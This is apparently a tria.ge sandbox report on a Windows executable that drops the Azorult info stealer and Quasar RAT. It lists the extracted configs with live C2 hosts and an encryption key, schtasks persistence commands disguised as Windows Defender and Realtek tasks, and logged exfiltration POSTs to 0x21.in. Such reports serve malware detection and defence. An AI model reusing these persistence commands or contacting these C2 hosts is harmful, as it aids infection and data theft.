Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    44s
  • max time network
    167s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/06/2024, 08:47 UTC

General

  • Target

    49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe

  • Size

    2.0MB

  • MD5

    8f5b039c605fd7c7ef8a894b210c4460

  • SHA1

    fd60eee7dd27a5f95d4a4b74b382453ee6b94b15

  • SHA256

    49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369

  • SHA512

    0931c19e331e6646ec939aa94f6c6ea76c468749e7353089545fee10b67ae3056d6ebc8de1f1628fe16fc75d4ee4ceafd366b5497a23a5c1d635e377fccda20e

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYN:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yj

Malware Config

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe"
    1⤵
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
        • Maps connected drives based on registry
        PID:2500
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      2⤵
      • Executes dropped EXE
      PID:1900
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4856
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        3⤵
          PID:1536
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1680
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\80xXuzNOkXj9.bat" "
            4⤵
              PID:3304
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                5⤵
                  PID:1568
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 10 localhost
                  5⤵
                  • Runs ping.exe
                  PID:4332
                • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                  "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                  5⤵
                    PID:5012
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 2292
                  4⤵
                  • Program crash
                  PID:3932
            • C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
              "C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe"
              2⤵
                PID:3360
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                2⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4964
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4792 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
              1⤵
                PID:3080
              • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                1⤵
                  PID:3540
                  • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                    "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
                    2⤵
                      PID:3672
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k
                        3⤵
                          PID:3632
                      • C:\Users\Admin\AppData\Local\Temp\windef.exe
                        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
                        2⤵
                          PID:1412
                        • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                          "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
                          2⤵
                            PID:4120
                          • C:\Windows\SysWOW64\schtasks.exe
                            "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:3708
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1536 -ip 1536
                          1⤵
                            PID:3396

                          Network

                          • flag-us
                            DNS
                            249.197.17.2.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            249.197.17.2.in-addr.arpa
                            IN PTR
                            Response
                            249.197.17.2.in-addr.arpa
                            IN PTR
                            a2-17-197-249deploystaticakamaitechnologiescom
                          • flag-us
                            DNS
                            58.55.71.13.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            58.55.71.13.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            18.31.95.13.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            18.31.95.13.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            157.123.68.40.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            157.123.68.40.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            107.12.20.2.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            107.12.20.2.in-addr.arpa
                            IN PTR
                            Response
                            107.12.20.2.in-addr.arpa
                            IN PTR
                            a2-20-12-107deploystaticakamaitechnologiescom
                          • flag-us
                            DNS
                            0x21.in
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            0x21.in
                            IN A
                            Response
                            0x21.in
                            IN A
                            44.221.84.105
                          • flag-us
                            POST
                            http://0x21.in:8000/_az/
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            Remote address:
                            44.221.84.105:8000
                            Request
                            POST /_az/ HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                            Host: 0x21.in:8000
                            Content-Length: 111
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Date: Tue, 25 Jun 2024 08:48:08 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                            Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                            Set-Cookie: btst=5d9a12a9933a3a92a2b11aa7cecfbd6e|191.101.209.39|1719305288|1719305288|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                            Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                          • flag-us
                            DNS
                            0x21.in
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            0x21.in
                            IN A
                            Response
                            0x21.in
                            IN A
                            44.221.84.105
                          • flag-us
                            POST
                            http://0x21.in/_az/
                            Remote address:
                            44.221.84.105:8000
                            Request
                            POST /_az/ HTTP/1.0
                            Host: 0x21.in
                            Connection: close
                            User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                            Content-Length: 111
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Date: Tue, 25 Jun 2024 08:48:10 GMT
                            Content-Type: text/html
                            Connection: close
                            Set-Cookie: btst=e1b446a6722e5b6c23ee92d2f0e497d8|191.101.209.39|1719305290|1719305290|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                            Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                          • flag-us
                            DNS
                            105.84.221.44.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            105.84.221.44.in-addr.arpa
                            IN PTR
                            Response
                            105.84.221.44.in-addr.arpa
                            IN PTR
                            ec2-44-221-84-105 compute-1 amazonawscom
                          • flag-us
                            DNS
                            69.31.126.40.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            69.31.126.40.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            95.221.229.192.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            95.221.229.192.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            228.249.119.40.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            228.249.119.40.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            217.106.137.52.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            217.106.137.52.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            ip-api.com
                            Remote address:
                            8.8.8.8:53
                            Request
                            ip-api.com
                            IN A
                            Response
                            ip-api.com
                            IN A
                            208.95.112.1
                          • flag-us
                            GET
                            http://ip-api.com/json/
                            Remote address:
                            208.95.112.1:80
                            Request
                            GET /json/ HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                            Host: ip-api.com
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Date: Tue, 25 Jun 2024 08:48:39 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 297
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                          • flag-us
                            DNS
                            1.112.95.208.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            1.112.95.208.in-addr.arpa
                            IN PTR
                            Response
                            1.112.95.208.in-addr.arpa
                            IN PTR
                            ip-apicom
                          • flag-us
                            GET
                            http://ip-api.com/json/
                            Remote address:
                            208.95.112.1:80
                            Request
                            GET /json/ HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                            Host: ip-api.com
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Date: Tue, 25 Jun 2024 08:48:43 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 297
                            Access-Control-Allow-Origin: *
                            X-Ttl: 56
                            X-Rl: 43
                          • flag-us
                            DNS
                            172.210.232.199.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            172.210.232.199.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            21.236.111.52.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            21.236.111.52.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            chromewebstore.googleapis.com
                            Remote address:
                            8.8.8.8:53
                            Request
                            chromewebstore.googleapis.com
                            IN A
                            Response
                            chromewebstore.googleapis.com
                            IN A
                            142.250.178.10
                            chromewebstore.googleapis.com
                            IN A
                            172.217.16.234
                            chromewebstore.googleapis.com
                            IN A
                            216.58.201.106
                            chromewebstore.googleapis.com
                            IN A
                            216.58.213.10
                            chromewebstore.googleapis.com
                            IN A
                            216.58.212.234
                            chromewebstore.googleapis.com
                            IN A
                            216.58.204.74
                            chromewebstore.googleapis.com
                            IN A
                            142.250.180.10
                            chromewebstore.googleapis.com
                            IN A
                            142.250.187.234
                            chromewebstore.googleapis.com
                            IN A
                            142.250.200.10
                            chromewebstore.googleapis.com
                            IN A
                            172.217.169.10
                            chromewebstore.googleapis.com
                            IN A
                            142.250.200.42
                            chromewebstore.googleapis.com
                            IN A
                            142.250.187.202
                            chromewebstore.googleapis.com
                            IN A
                            142.250.179.234
                          • flag-us
                            DNS
                            chromewebstore.googleapis.com
                            Remote address:
                            8.8.8.8:53
                            Request
                            chromewebstore.googleapis.com
                            IN Unknown
                            Response
                          • flag-us
                            DNS
                            10.178.250.142.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            10.178.250.142.in-addr.arpa
                            IN PTR
                            Response
                            10.178.250.142.in-addr.arpa
                            IN PTR
                            lhr48s27-in-f101e100net
                          • flag-us
                            DNS
                            sockartek.icu
                            Remote address:
                            8.8.8.8:53
                            Request
                            sockartek.icu
                            IN A
                            Response
                          • flag-us
                            DNS
                            0x21.in
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            0x21.in
                            IN A
                            Response
                            0x21.in
                            IN A
                            44.221.84.105
                          • flag-us
                            POST
                            http://0x21.in:8000/_az/
                            Remote address:
                            44.221.84.105:8000
                            Request
                            POST /_az/ HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                            Host: 0x21.in:8000
                            Content-Length: 111
                            Cache-Control: no-cache
                            Cookie: snkz=191.101.209.39; btst=5d9a12a9933a3a92a2b11aa7cecfbd6e|191.101.209.39|1719305288|1719305288|0|1|0
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Date: Tue, 25 Jun 2024 08:49:11 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                            Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                            Set-Cookie: btst=5d9a12a9933a3a92a2b11aa7cecfbd6e|191.101.209.39|1719305351|1719305288|31|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                          • flag-us
                            POST
                            http://0x21.in/_az/
                            Remote address:
                            44.221.84.105:8000
                            Request
                            POST /_az/ HTTP/1.0
                            Host: 0x21.in
                            Connection: close
                            User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                            Content-Length: 111
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Date: Tue, 25 Jun 2024 08:49:11 GMT
                            Content-Type: text/html
                            Connection: close
                            Set-Cookie: btst=0060bad468e911ba8977dbf091345360|191.101.209.39|1719305351|1719305351|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                            Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                          • flag-us
                            DNS
                            8.179.89.13.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            8.179.89.13.in-addr.arpa
                            IN PTR
                            Response
                          • 5.8.88.191:8080
                            svchost.exe
                            260 B
                            5
                          • 44.221.84.105:8000
                            http://0x21.in:8000/_az/
                            http
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            541 B
                            870 B
                            6
                            5

                            HTTP Request

                            POST http://0x21.in:8000/_az/

                            HTTP Response

                            200
                          • 44.221.84.105:8000
                            http://0x21.in/_az/
                            http
                            484 B
                            590 B
                            5
                            5

                            HTTP Request

                            POST http://0x21.in/_az/

                            HTTP Response

                            200
                          • 5.8.88.191:8080
                            260 B
                            5
                          • 208.95.112.1:80
                            http://ip-api.com/json/
                            http
                            374 B
                            566 B
                            5
                            2

                            HTTP Request

                            GET http://ip-api.com/json/

                            HTTP Response

                            200
                          • 208.95.112.1:80
                            http://ip-api.com/json/
                            http
                            466 B
                            646 B
                            7
                            4

                            HTTP Request

                            GET http://ip-api.com/json/

                            HTTP Response

                            200
                          • 5.8.88.191:443
                            260 B
                            5
                          • 5.8.88.191:8080
                            260 B
                            5
                          • 142.250.178.10:443
                            chromewebstore.googleapis.com
                            tls
                            1.9kB
                            7.7kB
                            16
                            17
                          • 5.8.88.191:8080
                            260 B
                            5
                          • 44.221.84.105:8000
                            http://0x21.in:8000/_az/
                            http
                            652 B
                            791 B
                            6
                            5

                            HTTP Request

                            POST http://0x21.in:8000/_az/

                            HTTP Response

                            200
                          • 44.221.84.105:8000
                            http://0x21.in/_az/
                            http
                            484 B
                            590 B
                            5
                            5

                            HTTP Request

                            POST http://0x21.in/_az/

                            HTTP Response

                            200
                          • 5.8.88.191:8080
                            260 B
                            5
                          • 5.8.88.191:8080
                            260 B
                            5
                          • 5.8.88.191:8080
                            260 B
                            5
                          • 5.8.88.191:8080
                            156 B
                            3
                          • 8.8.8.8:53
                            249.197.17.2.in-addr.arpa
                            dns
                            71 B
                            135 B
                            1
                            1

                            DNS Request

                            249.197.17.2.in-addr.arpa

                          • 8.8.8.8:53
                            58.55.71.13.in-addr.arpa
                            dns
                            70 B
                            144 B
                            1
                            1

                            DNS Request

                            58.55.71.13.in-addr.arpa

                          • 8.8.8.8:53
                            18.31.95.13.in-addr.arpa
                            dns
                            70 B
                            144 B
                            1
                            1

                            DNS Request

                            18.31.95.13.in-addr.arpa

                          • 8.8.8.8:53
                            157.123.68.40.in-addr.arpa
                            dns
                            72 B
                            146 B
                            1
                            1

                            DNS Request

                            157.123.68.40.in-addr.arpa

                          • 8.8.8.8:53
                            107.12.20.2.in-addr.arpa
                            dns
                            70 B
                            133 B
                            1
                            1

                            DNS Request

                            107.12.20.2.in-addr.arpa

                          • 8.8.8.8:53
                            0x21.in
                            dns
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            53 B
                            69 B
                            1
                            1

                            DNS Request

                            0x21.in

                            DNS Response

                            44.221.84.105

                          • 8.8.8.8:53
                            0x21.in
                            dns
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            53 B
                            69 B
                            1
                            1

                            DNS Request

                            0x21.in

                            DNS Response

                            44.221.84.105

                          • 8.8.8.8:53
                            105.84.221.44.in-addr.arpa
                            dns
                            72 B
                            127 B
                            1
                            1

                            DNS Request

                            105.84.221.44.in-addr.arpa

                          • 8.8.8.8:53
                            69.31.126.40.in-addr.arpa
                            dns
                            71 B
                            157 B
                            1
                            1

                            DNS Request

                            69.31.126.40.in-addr.arpa

                          • 8.8.8.8:53
                            95.221.229.192.in-addr.arpa
                            dns
                            73 B
                            144 B
                            1
                            1

                            DNS Request

                            95.221.229.192.in-addr.arpa

                          • 8.8.8.8:53
                            228.249.119.40.in-addr.arpa
                            dns
                            73 B
                            159 B
                            1
                            1

                            DNS Request

                            228.249.119.40.in-addr.arpa

                          • 8.8.8.8:53
                            217.106.137.52.in-addr.arpa
                            dns
                            73 B
                            147 B
                            1
                            1

                            DNS Request

                            217.106.137.52.in-addr.arpa

                          • 8.8.8.8:53
                            ip-api.com
                            dns
                            56 B
                            72 B
                            1
                            1

                            DNS Request

                            ip-api.com

                            DNS Response

                            208.95.112.1

                          • 8.8.8.8:53
                            1.112.95.208.in-addr.arpa
                            dns
                            71 B
                            95 B
                            1
                            1

                            DNS Request

                            1.112.95.208.in-addr.arpa

                          • 8.8.8.8:53
                            172.210.232.199.in-addr.arpa
                            dns
                            74 B
                            128 B
                            1
                            1

                            DNS Request

                            172.210.232.199.in-addr.arpa

                          • 8.8.8.8:53
                            21.236.111.52.in-addr.arpa
                            dns
                            72 B
                            158 B
                            1
                            1

                            DNS Request

                            21.236.111.52.in-addr.arpa

                          • 8.8.8.8:53
                            chromewebstore.googleapis.com
                            dns
                            75 B
                            283 B
                            1
                            1

                            DNS Request

                            chromewebstore.googleapis.com

                            DNS Response

                            142.250.178.10
                            172.217.16.234
                            216.58.201.106
                            216.58.213.10
                            216.58.212.234
                            216.58.204.74
                            142.250.180.10
                            142.250.187.234
                            142.250.200.10
                            172.217.169.10
                            142.250.200.42
                            142.250.187.202
                            142.250.179.234

                          • 8.8.8.8:53
                            chromewebstore.googleapis.com
                            dns
                            75 B
                            132 B
                            1
                            1

                            DNS Request

                            chromewebstore.googleapis.com

                          • 8.8.8.8:53
                            10.178.250.142.in-addr.arpa
                            dns
                            73 B
                            112 B
                            1
                            1

                            DNS Request

                            10.178.250.142.in-addr.arpa

                          • 8.8.8.8:53
                            sockartek.icu
                            dns
                            59 B
                            124 B
                            1
                            1

                            DNS Request

                            sockartek.icu

                          • 8.8.8.8:53
                            0x21.in
                            dns
                            49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
                            53 B
                            69 B
                            1
                            1

                            DNS Request

                            0x21.in

                            DNS Response

                            44.221.84.105

                          • 8.8.8.8:53
                            8.179.89.13.in-addr.arpa
                            dns
                            70 B
                            144 B
                            1
                            1

                            DNS Request

                            8.179.89.13.in-addr.arpa

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log

                            Filesize

                            1KB

                            MD5

                            10eab9c2684febb5327b6976f2047587

                            SHA1

                            a12ed54146a7f5c4c580416aecb899549712449e

                            SHA256

                            f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928

                            SHA512

                            7e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50

                          • C:\Users\Admin\AppData\Local\Temp\80xXuzNOkXj9.bat

                            Filesize

                            208B

                            MD5

                            978f3e5547c5496199ac7fc4761ac2ed

                            SHA1

                            932502f4f27015578c5d833aa82f2a0a989fd233

                            SHA256

                            adddcc9bab0f4309cbc9278a428bd2a136914c6c05edb98a2eadd1da20d60fb1

                            SHA512

                            bbfe8b6e82e5878148e620ec2554d98a945d0e7ad358574c0a2c05cc533bbd4cf604d43b055610abc9a68580c9fcd91912dae59860dd09d462608f45eb0d6818

                          • C:\Users\Admin\AppData\Local\Temp\vnc.exe

                            Filesize

                            405KB

                            MD5

                            b8ba87ee4c3fc085a2fed0d839aadce1

                            SHA1

                            b3a2e3256406330e8b1779199bb2b9865122d766

                            SHA256

                            4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

                            SHA512

                            7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

                          • C:\Users\Admin\AppData\Local\Temp\windef.exe

                            Filesize

                            349KB

                            MD5

                            b4a202e03d4135484d0e730173abcc72

                            SHA1

                            01b30014545ea526c15a60931d676f9392ea0c70

                            SHA256

                            7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

                            SHA512

                            632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

                          • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe

                            Filesize

                            2.0MB

                            MD5

                            d133cfafca93f417d797b11e70a3a68d

                            SHA1

                            380afa4c57590677ab1bb2121e7daa9e06881f0b

                            SHA256

                            c3f0e7badd18365f65baee9678d9110aa6f542fec497ba3044455cb7f37e0118

                            SHA512

                            4a39526df71cbaa53d731b85438ebf618b5ff5f204639e58ff8a867c60b17fe6e356b438746c1ed67a341d300a177144ee0ae46c0dbbd668b31f9409ea84b35b

                          • memory/1536-53-0x0000000006370000-0x000000000637A000-memory.dmp

                            Filesize

                            40KB

                          • memory/1900-43-0x0000000004F30000-0x0000000004F96000-memory.dmp

                            Filesize

                            408KB

                          • memory/1900-45-0x00000000061D0000-0x000000000620C000-memory.dmp

                            Filesize

                            240KB

                          • memory/1900-44-0x0000000005D90000-0x0000000005DA2000-memory.dmp

                            Filesize

                            72KB

                          • memory/1900-39-0x0000000000300000-0x000000000035E000-memory.dmp

                            Filesize

                            376KB

                          • memory/1900-40-0x00000000053E0000-0x0000000005984000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/1900-41-0x0000000004D60000-0x0000000004DF2000-memory.dmp

                            Filesize

                            584KB

                          • memory/2500-26-0x0000000000800000-0x000000000089C000-memory.dmp

                            Filesize

                            624KB

                          • memory/2500-42-0x0000000000800000-0x000000000089C000-memory.dmp

                            Filesize

                            624KB

                          • memory/2500-22-0x0000000000800000-0x000000000089C000-memory.dmp

                            Filesize

                            624KB

                          • memory/2500-21-0x0000000000800000-0x000000000089C000-memory.dmp

                            Filesize

                            624KB

                          • memory/2500-20-0x00000000008A0000-0x00000000008A1000-memory.dmp

                            Filesize

                            4KB

                          • memory/3360-35-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                          • memory/3360-27-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                          • memory/3632-76-0x0000000000020000-0x00000000000BC000-memory.dmp

                            Filesize

                            624KB

                          • memory/3632-80-0x0000000000020000-0x00000000000BC000-memory.dmp

                            Filesize

                            624KB

                          • memory/4120-81-0x00000000002E0000-0x0000000000300000-memory.dmp

                            Filesize

                            128KB

                          • memory/4120-87-0x00000000002E0000-0x0000000000300000-memory.dmp

                            Filesize

                            128KB

                          • memory/4948-18-0x0000000002280000-0x0000000002281000-memory.dmp

                            Filesize

                            4KB

                          We care about your privacy.

                          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.